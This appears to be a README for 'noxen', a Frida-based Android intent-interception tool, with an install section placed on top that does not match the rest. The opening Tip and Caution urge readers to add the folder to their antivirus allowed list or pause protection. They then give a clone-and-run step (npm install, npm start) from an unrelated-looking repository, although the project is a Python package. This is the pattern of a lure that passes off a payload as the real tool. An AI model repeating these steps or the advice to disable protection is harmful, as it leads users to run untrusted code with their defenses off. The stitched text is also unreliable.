Tip
If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.
Caution
Some security systems may block the installation. Only download from the official repository.
git clone https://github.com/InspectorBlock/noxen-741.git
cd noxen-741
npm install
npm start
Android runtime interception for security research. noxen uses Frida to hook Java
methods in a running Android process and map how app components communicate at
runtime. It captures attack-surface events such as android.content.Intent objects,
then lets you inspect, modify, forward, or drop them from a terminal UI.
- Helps map component communication and attack-surface behavior at runtime.
- Intercepts common Android runtime entry points such as
getIntent,startActivity,sendBroadcast,startService, andPendingIntentcreation paths. - Shows action, component, data URI, flags, categories, extras, PendingIntent flags, optional Java stack traces, and attack-surface labels where available.
- Lets you modify intent action, data, categories, flags, and extras before forwarding.
- Lets you drop intercepted intents.
- Stores captured history, outcomes, filters, columns, and modified intent snapshots
in
.noxenproject files. - Provides independent Intercept and History filters.
- Provides an optional Home-tab
Input ANR bypass (experimental)for rooted test devices, focused on input-dispatch ANRs while noxen intentionally holds a target thread. - Uses a structured Log tab with aligned source/level columns and optional
Verbose logsfor detailed hook and bypass diagnostics. - Analyzes APKs with androguard to generate hook configuration.
The companion Android target app lives in the noxen-playground repository.
It is named noxen playground on device and uses the package
com.frankheat.noxen.playground.
Use it to validate common runtime flows while developing noxen:
cd ../noxen-playground
./gradlew assembleDebugOpen noxen-playground/ directly in Android Studio rather than the workspace parent
directory.
The Python package uses a src layout: importable code lives in src/noxen/. This
keeps the repository root separate from the installed package and avoids shell
ambiguity between the noxen command and a local package directory.
After changing Python code, run the unit tests. When validating Frida compatibility, repeat the same checks with the Frida environments you support. For example, this repository is commonly tested with local Frida 16 and Frida 17 virtual environments:
../frida-16.6.6/bin/python -m compileall -q src/noxen
PYTHONPATH=src ../frida-16.6.6/bin/python -m unittest discover -s tests
../frida-17.7.3/bin/python -m compileall -q src/noxen
PYTHONPATH=src ../frida-17.7.3/bin/python -m unittest discover -s testsAfter changing agent/script.js or agent/system_server.js, rebuild the committed
Frida bundles and packaged runtime copies:
Commit the changed source script, its matching *_bundle.js file, and the synced
src/noxen/runtime/ copy. Do not commit node_modules/.
noxen is released under the GNU General Public License v3.0.